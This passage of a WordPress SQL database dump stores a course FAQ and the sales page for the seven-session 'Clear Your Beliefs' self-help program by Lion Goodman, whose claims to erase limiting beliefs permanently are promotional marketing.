guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 16:26:48', '2014-12-12 21:26:48', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2027, 2, '2014-12-12 15:26:39', '2014-12-12 20:26:39', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n \n\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n \n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n \n\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n \n\n&nbsp;\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a 